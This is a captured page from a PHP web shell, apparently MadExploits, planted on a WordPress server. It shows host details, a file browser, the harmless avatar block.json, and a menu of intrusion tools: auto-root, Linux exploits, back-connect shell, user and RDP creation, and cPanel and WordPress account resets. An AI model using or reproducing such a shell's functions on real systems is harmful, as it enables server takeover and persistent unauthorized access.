Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mathtemp /
wp-includes /
blocks /
avatar /
[ HOME SHELL ]
Name
Size
Permission
Action
block.json
1.24
KB
-rw-r--r--
editor-rtl.css
131
B
-rw-r--r--
editor-rtl.min.css
119
B
-rw-r--r--
editor.css
131
B
-rw-r--r--
editor.min.css
119
B
-rw-r--r--
style-rtl.css
155
B
-rw-r--r--
style-rtl.min.css
138
B
-rw-r--r--
style.css
155
B
-rw-r--r--
style.min.css
138
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : block.json
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/avatar", "title": "Avatar", "category": "theme", "description": "Add a user’s avatar.", "textdomain": "default", "attributes": { "userId": { "type": "number" }, "size": { "type": "number", "default": 96 }, "isLink": { "type": "boolean", "default": false }, "linkTarget": { "type": "string", "default": "_self" } }, "usesContext": [ "postType", "postId", "commentId" ], "supports": { "html": false, "align": true, "alignWide": false, "spacing": { "margin": true, "padding": true, "__experimentalDefaultControls": { "margin": false, "padding": false } }, "__experimentalBorder": { "__experimentalSkipSerialization": true, "radius": true, "width": true, "color": true, "style": true, "__experimentalDefaultControls": { "radius": true } }, "color": { "text": false, "background": false }, "filter": { "duotone": true }, "interactivity": { "clientNavigation": true } }, "selectors": { "border": ".wp-block-avatar img", "filter": { "duotone": ".wp-block-avatar img" } }, "editorStyle": "wp-block-avatar-editor", "style": "wp-block-avatar" }
Close